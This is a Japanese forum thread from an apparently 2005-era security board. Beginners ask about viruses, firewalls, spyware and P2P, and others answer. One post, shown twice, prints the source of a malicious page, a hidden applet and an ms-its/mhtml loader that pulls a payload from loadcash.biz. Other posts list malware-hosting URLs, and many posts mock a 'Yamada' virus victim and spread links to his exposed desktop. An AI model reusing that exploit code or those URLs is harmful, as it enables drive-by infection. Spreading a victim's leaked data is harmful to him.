と出たのですが、これは２ちゃんに時々あるウイルスコードに反応してるのでしょうか？
それとも本当に感染してるのでしょうか？

>>101
>これは２ちゃんに時々あるウイルスコードに反応してるのでしょうか？

場所とウイルス名からすればノートントラップだな

>>102
レスありがとうございます。一応気にしないでいいってことですか？

まだアンチウイルスソフトを持ってないので、明日買ってこようと思ってます。

>>103
気にしないでいい。心配なら他の会社のでもやってみたら。

>>104
安心しました。どうもありがとうございました！

よろしくお願いします。
TCP Monitor Plusというフリーウェアのソフトを先ほど進められて入れたのですが
お手数ですがこのJpgを見て頂きたいのですが・・・
http://49uper.com:8080/html/img-s/58781.jpg
ICQが普通に起動して通信しているのはわかるんですが
IEを立ち上げると、画像のように二つ表示されます。
時間も数秒ずれているしポートも違います。
もちろん二つIEを立ち上げているわけではありません。

これは一般的におかしいですか？

フリーウェアのそれなので意見でも構わないです
WinXPsp2でメーカー製のPCです。

>>106
おかしくない。それで正常。

>>107
そうですか・・・
今不正に動いているプログラムを探しているんですが・・・
ありがとうございました。

すいません。
起動時に、変なセットアップウィザードが立ち上がるようになり、
スタートアップ項目を漁った結果、
C:\Program Files\MsConfigs.exe
が、元凶みたいなのですが、これはなんでしょうか？

消しても?

何でそんなところにあるんだ
偽物じゃね？

>110
のようです・・・
ググると、海外ではけっこう有名みたいですね。

あと、Ｐ２Ｐｎｅｔｗｏｒｋ．ｅｘｅってのも、不思議と居座ってるんですが
システム構成ユーティリティでスタートアップから外しても
勝手に起動してるのですが、
どこから消す物なのでしょうか？

すいませんが教えてもらえませんでしょうか？

スレ違いの削除要求だして、その上荒し宣言するくらい必死なんだから、登録するなよ。
http://qb5.2ch.net/test/read.cgi/saku/1097242111/107-108
いいな絶対に登録するなよ。

ＦＭＶ　ＣＥ70Ｋ7　で、プレインストールされている、アンチウイルス2005を使用
している方で、［ファイルを指定して実行］から［services．msc　-ｓ］と入力して、
プログラムの項目の中に［symantec　core　Lc］と言う項目はありますか？
この項目がなければ、正常にインストールされてないみたいなのですが、マニュアルどおり
インストールしたのに、項目がありません。たまに［プログラムエラー］とか出ます。
リカバリーしてやり直してもみたのですが、やはり項目はありませんでした。
もともと本当は項目はないのでしょうか？　それとも僕のＰＣ自体がおかしいのでしょうか？
そもそも［symantec　core　LC］と言うプログラムは何なのでしょうか？

WinマシンとXPを購入したのですがOS搭載のFWだけでのネット接続は大丈夫（安心出来るレベル）でしょうか？
今のとこウィルス対策ソフトを買う金もないし、当分メールは使う予定は無いのですが

>>113
板違いだね
こっちの富士通関係のスレあたりで聞いてみてくれ
パソコン一般
http://pc8.2ch.net/pc/

もしくは
【ﾉｰﾄﾝ】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨVer.65【自己解決Ver2005】
http://pc8.2ch.net/test/read.cgi/sec/1115655502/

>>114
最低限フリーのでもｱﾝﾁｳｨﾙｽは入れといた方がいい。
フリーのアンチウイルスソフト Part5
http://pc8.2ch.net/test/read.cgi/sec/1107065884/

XP-S2の標準FWと市販FWの違いが解りません

http://p6f9b74.tokynt01.ap.so-net.ne.jp/
ｗｗｗおｋｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗっｗｗｗ
ｗｗｗっｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
うはっｗｗｗおｋｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

>>116
山田ウィルスに感染してますよ、駆除してください。

>>116
(´･ω･)ｶﾜｲｿｽ

>>116
（´・ω・） ｶﾜｲｿｽ

>>116
そんな生半可な知識でP2Pなんてしないでください。
ﾊｯｷﾘいってほかのﾕｰｻﾞｰの迷惑です。

（´・ω・）download板の山田スレまでどうぞ

>>116
（´・ω・） ｶﾜｲｿｽ

>>116
（´・ω・） ｶﾜｲｿｽ

>>121
お前に関係あるの？

>>116
（´・ω・） ｶﾜｲｿｽ

>>116
ｶﾜｲｿｽ(´･ω･)

>>116
（´・ω・） ｶﾜｲｿｽ

　　 ∩∩
　　 | | | |
　　(ﾟωﾟ ) ＜（´・ω・） ｶﾜｲｿｽ砲　ここまで
　 ｡ノДヽ｡
　　　bb

（´・ω・）ｵﾏｲﾗ撤収ｯｽ

>>116
ttp://nemoba.seesaa.net/article/2891535.html

>>116
初心者がp2pに手出すんじゃねえ！
おめえのデスクトップいままでずっと観察してきたぞｗ

>>116 あなた晒されてますよ
（´・ω・） ｶﾜｲｿｽ
http://tmp5.2ch.net/test/read.cgi/download/1116080611/l50

>>116
全世界にデスクトップが公開されてるよ

>>116
http://with2ch.net/up/data/1116080161.jpg

>>116
こちらへ来てください
XP-S2の標準FWと市販FWの違いについて教えてあげます
http://tmp5.2ch.net/test/read.cgi/download/1116080611/83-

>>116
(´･ω･)ｼﾞｬﾝﾌﾟ登録ｼｽｷﾞｽ
http://with2ch.net/up/data/1116080161.jpg

>>116
ttp://with2ch.net/up/data/1116080161.jpg
↑ウイルスに感染しているためあなたのPCがこのように全世界に公開されています。

　　 ∩∩
　　 | | | |
　　(ﾟωﾟ ) ＜（´・ω・） ｶﾜｲｿｽ砲　ここまで
　 ｡ノДヽ｡
　　　bb

（´・ω・）ｵﾏｲﾗ撤収ｯｽ

だから、なんていうか厨丸出しな奴が調子ぶっこいてP2Pとかやると見てて腹立つんですよ。
やるならやるで自分で予備知識つけといてください。

ただ見苦しい。

>>116=121？

(´･ω･)ｶﾜｲｿｽ ←しょぼーんウイルス

>>116
http://with2ch.net/up/data/1116080161.jpg

>>115
一応ネット接続は固定のサイトへのアクセス程度で常時接続や長時間ネットサーフィンと言った利用は考えておりませんがやはりｱﾝﾁｳｨﾙｽ必要ですか…
追質なりますが、スパイウェアとか言うのはFWで防げる類いのものではないのでしょうか？
ｱﾝﾁｳｨﾙｽで防げるのでしょうか？
それともそれ専用の防御＆駆除ソフトがあり、それも必要なのですか？

スレ突撃は迷惑だからもうやめて巣に返ろう

(´･ω･)ﾏﾁｶﾞｴﾀｽ
>>116=>>125？

>>116
とりあえず、これだけでも読んで試してほしい。
山田ウイルスの確認方法だから。
http://tmp5.2ch.net/test/read.cgi/download/1116080611/36

>>116の為にあるようなスレでつねｗｗｗ

>>125
受信メールを丸ごと抜かれてる可能性もあるわけだから、
この人と関係した人の個人情報もダダ漏れかも知れないわけよ。

撤収〜〜〜〜〜〜〜〜〜〜〜〜

　　 ∩∩
　　 | | | |
　　(ﾟωﾟ ) ＜（´・ω・） ｶﾜｲｿｽ砲　ここまで
　 ｡ノДヽ｡
　　　bb

（´・ω・）ｵﾏｲﾗ巣に帰るｯｽ

ああ、IDが出ないのか！残念！！！

>116
さんウイルスに感染しています。

パソコンの中身をネットに公開する奴です。
通称山田ウイルス。

現在winnyでジャンプ関係のファイルをダウンしまくっているのが
バレバレです。
http://192.168.1.10/p2__kenji/read.php?host=tmp5.2ch.net&bbs=download&key=1116080611&ls=143-&nt=114637#r143

にくれば対処法教えます。

>>116
143 ：[名無し]さん(bin+cue).rar：2005/05/14(土) 23:40:20 ID:jhJotqgM0
http://www.uploda.org/file/uporg98760.jpg

>>146
これって亜種も同じ?

>>154
116か？とりあえず山田ﾖﾁスレにきなよ

>154
同じだよ。
とりあえずはね。
ポート番号もついてる新種はわからんけどね。

>>154
基本的には同じはず。
ただ、現在無数に亜種が作成されている状態だから、今後もこの方法が
有効とは限らない。
また、同様な理由でアンチウイルスソフトの対策が間に合っていないので、
アンチウイルスの検索で感染が確認されなくても安心できない。

>>153
実名出てる
（´・ω・） ｶﾜｲｿｽ

いくつかのスレで新種の山田書き込みっぽいのが見受けられますね。

ああー、苺のときにウイルス情報質問総合スレで一気に１００レス以上ついた時を思い出す・・・

こんなPCはネットにつなぐな！ 3日間放置した無防備PCの結末は？ / デジタルARENA
http://arena.nikkeibp.co.jp/col/20050510/112145/

なかなか面白いことやってる

コンピュータ・アソシエイツの話はどちらで聞けますか？

何の騒ぎかと思ったら、山田の犠牲者が質問しに来てたのか。

エロ動画サイトでウイルスだかスパイウェアに感染してしまいました。
ウイルスバスターで検索→検出なし
Ad-awareで検索→大量に検出→削除　となって一安心と思ってたんですが
なんか、ＰＣを起動するたびに、見覚えのない「〜.exe」が起動して動作が重くなり
おかしいと思ってAd-awareで検索すると案の定スパイウェアが検出されるんです。
どうやったら完全に駆除できますか？

>>143について

山田祭りで過激にスルーされた様ですので御教示願えませんか？

>>165
必要です。こういう質問をするような人は、片っ端から入れてください。
それがあなたのためであり、ひいては周りの人のためにもなります。

スパイウェアはFWもアンチウイルスソフトもすり抜けます。
多くはセキュリティーホールを突いて、こっそり勝手に業者にとって都合のいいソフトを送り込みます。
ちゃんとWindowsUpdateをしていないと、非常に危険です。ブラウザからでも感染します。

アップデートをきちんとチェックし、ルーターを設置。パーソナルファイアーウォールとウイルス対策ソフトを導入。
これに加えて、スパイウェア対策ソフトを入れると、危険度はかなり下がります。
あと、P2Pをしない。やたらとWebにあるファイルをクリックしない。怪しいソフトには手をつけない。

制限だらけのようですが、ひとつひとつ身につけていってください。
別にノーガードでもかまいませんが（運が良ければ、さほどの被害には遭わないかも？）、それはあなたの自由。
誰もあなたを止めたりはしません。泣くのは私ではなく、あなたですから。

ちなみに、ウイルス対策ソフトもファイヤーウォールもフリーウェアで存在します。
スパイウェア対策ソフトもです。
ただし、どれもそれなりの勉強が必要です。
初心者がいきなり導入して、さくさく動くぜやったねパパ、明日はホームランだ！　というわけにはいきません。

この板を見れば、専用のスレがあります。
ひとつひとつ見ていって、あなたにあった物を選んでください。
どれがいいか？　と言われても、俺の知ったこっちゃねぇよ、勝手に汁！　と言われるのがオチなので、
他力本願もほどほどに。
初心者だからといってそこまで人に頼るようでは、先が思いやられますので。

ウイルスバスター使ってるんですけど、ブロックしたアクセスの情報のところが
１分ごとぐらいに更新されていくんですが、これはほっといて大丈夫なんでしょうか？

>>168
ステルス状態ではなく、ポートが閉じている状態ならそんなもん
ポートが開いていない限り問題ない

>>169
レスありがとう。ちょっとビビってたんで本当にどうも！

す、すいません。>>98もう一回きいてもいいですか？
どなたかお願いします

Ｐ２Ｐってなんですか？
釣りじゃないです・・・

>>172
mxとかファイル交換ソフトのことじゃなかったっけ・・・

Peer to Peerのこと。
peerとは同等の人、対等者、仲間、同僚、同業者の意。

point　to　point

>>172
Peer to Peer。to を two と発音が似ているので、数字に置き換えて、P2P。
似たようなのに、for→4 というのがある。

P2Pソフトとしては、WinMX や Winny、Share などがある。
他にも Bitttorrent や eDonkey、Gnutella系(LimeWire、Shareazaなど)、Kazaa など様々な種類がある。
多くは違法なファイルがやりとりされているが、Bittorrent は Linux のディストリビューションの配布に使われたり、
最近では NASA がプログラムを配布する方法としても採用されていたりする（本当）。
また、Skype という無料で電話ができる（合法的な）プログラムでも P2P の技術が使われているなど、
必ずしも P2P＝違法（悪）ではない。便利な道具は、使い手によっていかようにでもなるという、いい例だとおもってほしい。

P2Pでやりとりされているファイルの中には、悪意あるツールを仕込んだ物も多い。
ウイルスやトロイの木馬など、何も知らないでクリックすればたちまちやられてしまうので、素人にはお勧めできない。
また、ロジック爆弾と呼ばれるタイプの悪意あるプログラムにはウイルス対策ソフトも反応しないことが多く、
気が付いたらハードディスクが真っ白になっていたり、全世界に向けてスパム（迷惑）メールを発信する発進台にされたり、
その他、様々なことが起きる可能性がある。

インターネット閲覧は自己責任で。自分を守るのは、自分だけです。

>>171
ここにいるヤシ全てがavastや専ブラ使ってるわけじゃないから。
ソフトの事はそのソフトの専スレで聞け。
つーか その方が早いぞ。
avast! 4 Part14
http://pc8.2ch.net/test/read.cgi/sec/1115369929/

レンタルの画像掲示板なんですが
クリックしただけでほとんど半殺しの目にあってしまいました。
誰がこういうことをしたのでしょうか？
持ち主でもほとんど設定できないレンタル掲示板なのに
掲示板にアクセスしただけでかなり強力なウイルスに感染してしまう
ような状況にされてしまいました。
なにか意図的に狙われたのでしょうか？
それともよくあることなのですか？
どうかくわしいかた教えてください。

ウイルスソフトなしでアクセスしたら大変な目にあうので
注意してください。
ttp://imgbbs1.artemisweb.jp/robekaru/

>>178
jpegに偽装されたHTMLファイルがその掲示板に貼られていて
そこからrefreshでスパイウェア付きエロサイトに飛ばしている模様

javascriptを切っておかないと確かに危ないかもね

>>177
そうします、すいませんでした

>>178
去年の９月にパッチで完全対応したセキュリティホールに今頃やられているんだからただのアホでしょ？
ウィンドウズアップデートもしていないお前の負け
http://www.microsoft.com/japan/security/incident/download_ject.mspx

Windows Updateしないのは自業自得だな。

>>178
こいつにはノートン未対応だべ
だからマカフィーにしろって言っているんだ
いずれにしても、セキュリティソフトを過信しているおまえがバカだ
ウィンドウズアップデートくらいしろ

>>178
http://205.252.250.226/zator/adv3048/
http://81.222.131.59/dl/adv659.php
ちなみに仕込まれているサイト

>>184
開くとウイルス反応出るね。

>>178
別になんともないんだが・・・
JAVA off、WinUpdate済み、NAV最新版

これってなんかあるのか？

>>184
ここも何の反応もしない
上のは何にも出てこないし
下のはInternal Server Errorで表示不能

>>181のセキュリティホールはスクリプト実行だ　バカ

先程ネットやってたら画面に血しぶきが出てきて
「キャー」という悲鳴と共に「ぬるぽ」という文字が出てきて
電源切ったら再起動出来ない状態になりました
これって前に流行ったキンタマってヤツですか？
今流行りの山田ウィルスとかいうヤツもこんな風になるんでしょうか？

どっちにしても気付かずになんか食らってたんだと思うんですけど
血しぶきが飛ぶタイミングってなんなんですか？
どういう条件が揃うと血飛沫に至るとかってあるんですか？
それともランダムで血飛沫なんでしょうか？
あと、山田はわかんないですけどキンタマだと
ＨＤの中身をぬるぽに書き換えられてしまうようですが
それを回避する方法ってありますかね？
厨質ですみませんが、どなたかよろしくお願いします

>>189
>>1嫁そしてサイナラ

107 名前："削除"依頼[] 投稿日：05/05/14 12:51 HOST:YahooBB219048080233.bbtec.net<8080><3128><8000><1080>
削除対象アドレス：
http://pc8.2ch.net/test/read.cgi/sec/1115806118
http://pc8.2ch.net/test/read.cgi/sec/1115806118/72
http://pc8.2ch.net/test/read.cgi/sec/1115806118/87
http://pc8.2ch.net/test/read.cgi/sec/1115806118/92

削除理由・詳細・その他：
詐欺メールのアドレスに、暗号でメールアドレスが含まれていて、
何百通のメールアドレスが来て困ってます。



108 名前：”削除”依頼[] 投稿日：2005/05/14(土) 18:08:09 HOST:YahooBB219048080233.bbtec.net
早く削除してくれよ。
それとも自力で残り９００レス埋めろってことですか？

反応がないなら自力で埋めますよ。



110 名前：菜無し酒粕 ◆Lees/uTRY. [sage] 投稿日：2005/05/14(土) 21:09:20 HOST:dsl055-020.kcn.ne.jp
それと、削除人さんが次にいつ巡回に来られるかはまったくわかりません
事情はわかりますが、督促されるとかえって放置される可能性があります
最後に、私は助言を行っている唯の一利用者ですので、お間違えなきように


111 名前：削除屋つまようじ ★[sage] 投稿日：2005/05/15(日) 19:38:13 ID:???0
>>106　停止しました
>>107　あきらめてください

FWって二つ入れても無意味ですかね？
ＺＡと北斗の拳ＦＷを入れているのですが・・・

>>192
無意味どころか却って逆効果
どっちかアンインストールしなされ

・WinXP（sp2にしようとしたのですが、更新するとあまりに重くなるので戻しました）
・IE6
・ノートンアンチウィルス2003
・ケーブル

ネットをしだして１年目になるのですが今日はじめてファイアーウォールというものを知った
無知な自分なのですが、お答えいただけたらと思い書き込みします。

今日、Xpのファイアーウォールをやっと設定しました。
そしたらすごくPCが軽くなったんですが、これは今までハッキング（？）されていたと
いうことなのでしょうか。
明日ZoneAlarmを買いにいってインストールしようと思いますが
もう大丈夫と思ってもよいのでしょうか。

最初から入っているウイルス対策ソフトは体験版で９０日で使えなくなるみたいなんですがそれまでは使っていても大丈夫でしょうか？機能なども店で売っている物より劣るのでしょうか？教えてくださいm(__)m

>>195
NortonAntiVirusのことかな？
機能はまったく一緒です。有効期限が過ぎたあとは、更新手続きをきちんと取ればそのまま更に１年間使えます。
その期間がまた過ぎたら再更新。また１年追加。あとはメーカーがサポートを打ち切るまでこれの繰り返し。
ウィルスバスターなどの他のウィルス対策ソフトも基本的にノートンアンチウィルスと同じです。

196 ありがとうございました！とりあえず体験版を使ってみます。

>>193
試用版ですのでＺＡをｱﾝｲﾝｽｺすることにします。
ありがとうございました〜

http://www.pornbook.net/
お聞きしますね
例えばこのサイトなんかを踏むと、世界中から445番へのアクセスが集中して始まるんですけど、
ウィルスなどに感染している様子もないし、怪しいプロセスも起動されていないし、
何故なのかわからないんですよ。
だけど、再起動すれば止まるんですよね。
ただ単にサイトがそんな悪質な作りになっているんですかね？

http://www.loadcash.biz/adverts/35/1.htm
http://www.loadcash.biz/adverts/35/BlackBox.class
http://www.loadcash.biz/adverts/35/Dummy.class
http://www.loadcash.biz/adverts/35/VerifierBug.class
ウィルスが仕込まれているこのサイトのページアドレス

直リンすんなよ

<script language="JavaScript">
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "cn") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "zh") document.location = "http://awmcash.biz/adverts/nafig.html";
</script>
<html>
<head>
<title></title>
</head>
<body>
<applet CODE="BlackBox.class" width=1 height=1></APPLET>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/x-scriptlet"></object>
</body>
</html>

ZoneAlarmとKerioどっち使おうか迷ってます。
kerioが軽いらしいですが、どんだけ設定が面倒なんでしょうか。
FWソフト入れるのは初めてです。
簡単なZoneAlarmの方がいいですかね？

>>202
ZoneAlarmは細かな設定はなーんにもできない
基本的にある実行ファイルごとに対して、全許可（完全な信用）か遮断の２択を決めるだけ。
信用しておいたファイルが改変されて変なところにアクセスするようになってしまうと、あとは落ちるとこまで落ちるだけ。
一方、KerioやOutpostは細かな設定ができるからこういうことは起きない。

細かな設定といっても、解説サイトを見ながらやればわかるから、
ほんのちょっとの努力をすることができるならば後者のほうがいい。
解説サイトみても分からなければ、ZAをいれるといい。
KerioもOutpostも設定方法は変わらん。インターフェイス（表示される画面）が好きな方を選べばいい。

最後に、ウィルスバスターやノートンのインターネットセキュリティなどは決して入れないこと。

>>203
ありがとうございます。
設定する前に諦めるのもなんなんで
取りあえず、解説サイト見ながらkerio入れてみますね。
それで、この板にスレが二つあるのですが
何か違いがあるんですか？
バージョン違い？
どちらを使った方がいいのでしょうか？

>>204
そこまで面倒みきれん
２つあれば、２つ見ればよいだろ

>>204
そんあなたにZA。
ZAで充分です。
物足りなくなったら変えればいい。
俺はZA使ってる。

>>205
そんな。
FAQ消えてるし。
テンプレ見ても大した違い書いて無いし
ttp://www.kerio.com/kpf_comparison_version.html
の比較見てもどっちが良いか分からない。。。

>>206
かなぁ・・・。

online Trojan Scannerでkillapps.exeというファイルに警告が出たんですが
これは問題のあるものでしょうか？
他のウィルス診断では検出されませんでした。
ファイルはCreativeのSoundBlsterAudigy2のフォルダの中にありました。

　価格COM騒ぎで　AntiDote　というセキュリティソフトで検査したら、あるDLLの中に
　TrojanSpy.Win32.GhostSpy.30
　というのが見つかりました。
　「キーロガー」というスパイウェアだそうで、ヤバそうなので削除しましたが
　これによって被害を受けていたかどうか、というのを探る方法はありますでしょうか？

　ファイアーウォールに「Outpost」を使っているのですが、送受信許可の中に問題のある
DLLがあったソフトウェアを入れた事はありません。
　それでも、情報は洩れていたのでしょうか？

>>209
(・ε・)ｷﾆｼﾅｲ!!

>>210
　気にしない、でいいのですか？

　削除はしたのですが。気にしなくていいのですかね・・・。

ToRoI Buster
トロイの木馬の発見&除去をサポートするセキュリティツール

こんなんみつけたんですがつかったことありますか

Outlook Expressを使っていて、
変なアルファベットの件名になった添付ファイルつきのメールがよく来るのですが、
この添付ファイルがウィルスかどうかを判別するにはどうしたらいいのですか？

>>213
基本的には調べるまでも無く即削除。

JavaScript切ってれば、IEとかのHP回覧でウィルス感染することってないですよね？

avast!でこのスレがトロイに感染していると出るのは何故ですか？

>>216
Jane Doe で見てるが反応しないな

<script language="JavaScript">
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "cn") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "zh") document.location = "http://awmcash.biz/adverts/nafig.html";
</script>
<html>
<head>
<title></title>
</head>
<body>
<applet CODE="BlackBox.class" width=1 height=1></APPLET>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/x-scriptlet"></object>
</body>
</html>

PCを初めて買いウイルス対策ソフトの購入を考えてます。料金、性能等でおすすめなものを教えてください。XPです。その他ウイルス対策のアドバイスも頂けたら幸いです

>>219
市販の対策ソフトならば　Nortonかトレンドマイクロの２択
他のはいくら安くても検出力がイマイチ
無料のAVGなんかよりもオススメできない

毎月検出力ランキングが発表されているからそれ見てどれをいれるか考えな
念のためいっておくけど、ランキングがどこにあるかなんて野暮な質問はするなよ

この時期にトレンドマイクロって釣りかｗ

>>219
ウイルス対策のアドバイス？
「ネットに繋ぐな」「メールを読むな」
これが最強の対策だが。

質問が漠然としすぎて答えようがない。
まずはこのスレの>>1-10あたりをじっくり読む事だな。

即レスありがとうございます。指摘された通り明確な答えの出しにくい質問ですいません。あと複数のウイルス対策ソフトを入れて使う事は可能なんでしょうか？それと上記にある「無料のAGV」はフリーソフトなんでしょうか？

>>223
ファイアウォールもウィルス対策ソフトも複数は入れない

もう寝たいし、これ以上説明するの面倒だから参考になりそうなuri貼っとく
http://www10.plala.or.jp/palm84/antivirus.html

AVGとはこれのこと
AVG Anti Virus: HOME
http://www.grisoft.com/doc/1

AVGを使おうと思うんですが英語表記なのでむずかしいと言われました。ネット初心者の私でも解説サイトをみれば使えるでしょうか？無理ならウイルスバスターを使おうと思うのですが…

>>223
　ＡＧＶ　じゃなくて　ＡＶＧ。
　GRiSOFT　ってとこのフリーソフト。

　この板にスレがあるからそれ読んでちょ。
　http://pc8.2ch.net/test/read.cgi/sec/1116103118/

>>225
　まとめサイトがあるからそこの解説詠みながらやれば英語がわからんでもOK.

すいません　質問です。
最近パソコンを起動する時に
DNS_INT Buffer length >=1024
というのが何度も出てくるのですがこいつはなんなんでしょうか？
また、どうやったら出てこなくなりますかね…

たとえば、既製のウィルスと関係のない正常なソフトのsetup.exeのようなものに
誰かがウィルスを追加する形で混ぜていて、
実行するとその本来のソフトはきちんとセットアップできるが
同時にウィルスも行動を開始してしまう、というものもあるのでしょうか？

テンプレの>>9に｢駆除｣という用語がありますが、
これは上に書いたようなファイルの中からウィルスの部分だけ取り除いて
元の正常なsetup.exeに戻すようなことをあらわした用語なのですか？

おそくまで私の初歩的な質問に付き合って頂きありがとうございました。紹介してもらったサイト、アドバイスを元に考えてみたいと思います

すいません、急いでるので早くしてもらえませんか？

は？バカかてめえ

すっげえ悪質なイタズラ思いついたｗｗｗｗ
http://ex10.2ch.net/test/read.cgi/news4vip/1116266649/

そんなに急いでどしたん？

>>231
半年ＲＯＭってろカス

君らなぁ・・

ウィルス入ってるのが判ってる割れソフトでも使いたいのかね？

>>233
これ、IDの出ないセキュ板ではホント悪質になるなぁ。
でも>>229はやっぱ割れに関する質問だろうしなぁ・・・。

>>231は私ではないです。

割れは知識がなくて、ばれたときが怖いのでやらないですが、
ベクターとかから落とせるものの中にも
ウィルスが混ぜられているものがある、という話を以前2chのどこかで聞いたもので…。

ウィルスでなくてスパイウェアなんかは有名なソフトほど
混入させている可能性が高い、とか言ってるプログラマーがいたのですが
そういうのはほうっておいていいですか？
検索キーワードにエロいのを入れてたのが
どっかにばらされたりしてたら困るんですが。

何度もすみません、
私の質問が割れ厨への回答にもなってしまうようでしたら、
無視して頂いて結構です。
失礼いたしました。

Adware.Gatorに感染してるって出たんですが
どうやったら駆除できますか？

>>242
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.gator.html

文字化けしてるな

>243
さっぱりわかりません。
やはり、ノートンを買うべきでしょうか・・

>>244
シマンテックでスキャンしたら検出したの?
危険なものでも無さそう。

ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=SPYW_DASHBAR15.A

AdawareSEやspy-botで削除できない？

>244
はいそうです。危険ではないみたいだけど。
やってみます。ありがとう。

ＦＷのログに　tiger2501.maido3.com　ってのが残ってたのですが
これはいったいなんでしょうか？
ググッてもわかりませんでした
使ってるブラウザはＯｐｅｎ　Ｊａｎｅ　Ｄｏｅ　です

>ググッてもわかりませんでした
嘘付け
URL tiger2501.maido3.comに関する情報は見つかりませんでした。
URLが正しい場合は、ここからtiger2501.maido3.comを開いてみてください。
"tiger2501.maido3.com"を含むページの検索
http://tiger2501.maido3.com/

>>241
ベクターとういうことであれば、ここを参考に自己判断。

『Vector』のウイルスチェック体制
ttp://www.vector.co.jp/info/vtest.html

最近のウィルスソフトの検出率とかを比較したデータとかサイトとかってないかな？

たまにノートンアンチウイルス2005内部エラーとか出るんですが、時間がたつと正常に
戻ってます。
これはどういう事なのでしょうか？
ただ、たんにプログラム上で認識が遅れたために起こる現象なのでしょうか？
プレインストール版で起きてた現象なので、市販の製品に買い換えたばか
りなのですが、同じような現象が起きました。
ノートンアンチウイルス2005です。ＰＣの方のプログラムがおかしい
のでしょうか？
初心者ですみません。

>>251
内部エラーの番号をきちんとメモして、
http://www.symantec.com/region/jp/techsupp/knowledge_base.htmlで検索。

２５１です。内部エラーは［３０２９００２７］です。
シマンテックサイトの方でも調べてみましたが、アンインストール＆再インストール
してください。という事くらいしか原因解明できないみたいです。
プレインストール版を使用していた時は、いちどリカバリーもしました。
それでもエラーが出るので市販のを買いました。それでも同じエラーが
出てしまいます。一時的にエラー表示されて、少し時間たったり、再起動してみると、
正常に戻ってるみたいです。わけわかりません・・・。

>>250
ttp://www.virus.gr/english/fullxml/default.asp?id=69&mnu=69

17. PC-Cillin 2005 version 12.1.1034 - 85.98%
これはウイルスバスター。

>>254
おお！�dｸｽ

インターネットオプションのセキュリティの「インターネット」は、既定のレベルでＯＫでしょうか？

>>253
そこまでやって駄目なら、シマンテックに問い合わせた方が早いと思うのだが。

ＰＣの不具合で、ウイルスソフトに影響する事ってありますかね？
一般的にウイルスソフトで、ウイルス検出＆駆除とかは良くある事ですが、
エラー表示はそんなに出ないものですよね？
本当に不具合が発生しているなら、毎回エラー表示されるものですよね？

これは何かやばいファイルでしょうか？
知らずに踏んでしまったのですがウィルスだと書かれてました。
http://www.imgup.org/file/iup30199.jpg

>>258は>>251か？
ごちゃごちゃ言わずにシマンテックのサポートに電話かメールすれ。

>>259
この板では鑑定はしない。
ラウンジhttp://etc3.2ch.net/entrance/の
勇気が無くて見られない画像解説スレ Part701
http://etc3.2ch.net/test/read.cgi/entrance/1116135965/l50へ。

>>260
ありがとう

２５１・２５８ともに僕です。
他のみなさんは、どうなのだろうかと思って質問してみました。
シマンテックにもメールしました。解答待ちですが、もしかしたら
ＰＣが悪いのでしょうか・・・。

>>262
それだけの情報で何が悪いか他人に分かるはずがない。
回答が来たら報告してくれ。以上。

２６２です。スクリーンセーバーから消費電力モードになって、少し時間が
たってからキーボードのカーソルキーを押して画面表示させた直後にまたエラー
表示されました。［コンポーネントがインストールされてなく、ロードできません］
と出ました。その後、いったんエラー画面を閉じて、再度、ノートンアンチウイルス２００５
の状態をしらべたら正常でした。
やはりプログラム上で認識が遅くて起きてしまう現象なのでしょうか？
シマンテックに電話するしかないかな・・。

つチラシ＞264

次の方どうぞ。

タスクマネージャーにIEXPLORE.EXEなるものがあるんですがこれって初めからあるものでしょうか？

>>266
うちのXPには無いぞ。

マジですか。ググッたらウィルス関連のページ出てきたんでｶﾞｸﾌﾞﾙなんですが
普通にあるみたいなこと書いてあるとこもあるし
大文字と小文字だとまた違うんでしょうか？

>>266
なんか仕込まれた時に出たことがある。　あんたもそうかもよ・・

トレンドのオンラインスキャンを実行したら［JAVA_BYTEVER.A］が検出されました・・。
しかしノートンではなんどやっても検出できず。。
下記の対応策では単純に削除すれば良いとのことですが、
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JAVA_BYTEVER.A
単純削除とは何？自分でファイルを見つけて右クリックで削除しろということ？（怖い・・ｶﾞｸﾌﾞﾙ）
でもそんなファイルどこ探しても見つからないですし・・・。どうやったら削除できるのか・・

てゆうか、、、なぜノートンは無反応なわけ？この役立たず！！！

ちなみにWindows Updateは毎日自動更新にしてあるので常に最新の情報になってます。（確認済み）
今のところこのウイルスによる被害は感じられない（もしくは自分が気づいていないだけなのかも・・）。

なんであれ早く取り除きたいです。どなたかアドバイスお願いします。。<(_ _)><(_ _)>

>>266
もしかしてIE使ってる？

>>270
検出結果にちゃんとファイル名と場所が表示されていたはずだけど。
単純に削除してOK。

>>271
使ってますけど。昨日バスターのオンラインスキャンやったばっかなんだけど怖くなってきた・・・
explorer.exeとどう違うんですかねぇ

WindowsXP+NIS2005+ルータ
Windowsパッチはまったく当てていません。
このPCでHP立ち上げるのはまずいですか？

>>274
なぜUPDATEしないのか、その理由は？

ブラウザの方が「IEXPLORE.EXE」、それと「explorer.exe」は全くの別物だろ
どっちも元からある正常なプロセス

>>266
プロセスウォーカーとかで調べてみれば？

>>215
どなたかおながいしますm(__)m

>>278
ちゃんとWindowsUpdateやってれば、大丈夫だとおもうよ。
ご参考までに
アダルトサイト被害対策の部屋：転ばぬ先の杖 − さらなる被害を受けないために
ttp://www.higaitaisaku.com/korobanu.html

>>278
感染はJavaだけが原因じゃないよ。Web表示しただけで感染する場合もある。

>>278
完全を期すのなら、
VBScriptとJava appletもダメだぞ

>>279-281
返信ありがとうございます。
参考にさせていただきます。

セキュリティに詳しくないんで、とりあえず>>249のリンク先を読んでみたんですが、

●自己改変型のプログラムファイル
動作中に自分自身を書き換えるプログラムで、書換後のプログラムファイルにウイルスが感染している場合（もしくは書き換え後のプログラム自身がウイルスである場合）

